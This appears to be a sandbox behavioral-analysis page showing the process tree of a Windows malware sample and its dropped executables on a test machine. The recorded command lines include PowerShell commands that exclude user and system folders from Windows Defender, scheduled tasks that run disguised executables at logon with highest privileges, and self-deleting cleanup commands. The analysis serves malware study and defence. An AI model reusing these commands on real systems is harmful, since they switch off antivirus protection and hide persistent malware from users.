| ZeroBOX

m.exe "C:\Users\test22\AppData\Local\Temp\m.exe"
2240
- kio.exe "C:\Users\test22\AppData\Roaming\kio.exe"
  2624
  - cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
    2128
    - powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22'
      2208
    - powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Roaming'
      2448
  - cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Users\test22\AppData\Roaming\kio.exe"
    2740
    - svchost32.exe C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Users\test22\AppData\Roaming\kio.exe"
      2576
      - cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
        2120
        
        schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
        3036
      - services32.exe "C:\Windows\system32\services32.exe"
        2360
        
        cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
        1100
        
        powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22'
        1364
      - cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\svchost32.exe"
        2512
        
        choice.exe choice /C Y /N /D Y /T 3
        260
- wer.exe "C:\Users\test22\AppData\Roaming\wer.exe"
  2164
  - cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
    200
    - powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22'
      112
    - powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Roaming'
      236
  - cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\svchost64.exe "C:\Users\test22\AppData\Roaming\wer.exe"
    2680
    - svchost64.exe C:\Users\test22\AppData\Local\Temp\svchost64.exe "C:\Users\test22\AppData\Roaming\wer.exe"
      844
      - cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "splwov" /tr '"C:\Windows\system32\splwov.exe"' & exit
        1912
        
        schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "splwov" /tr '"C:\Windows\system32\splwov.exe"'
        916
      - splwov.exe "C:\Windows\system32\splwov.exe"
        2228
        
        cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
        2536
        
        powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22'
        1348
        
        cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\splwov.exe"
        2608
      - cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\svchost64.exe"
        2932
        
        choice.exe choice /C Y /N /D Y /T 3
        2648
- cmd.exe cmd /c C:\Users\test22\AppData\Roaming\helper.bat
  2532
  - taskkill.exe taskkill /f /im m.exe
    2720

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents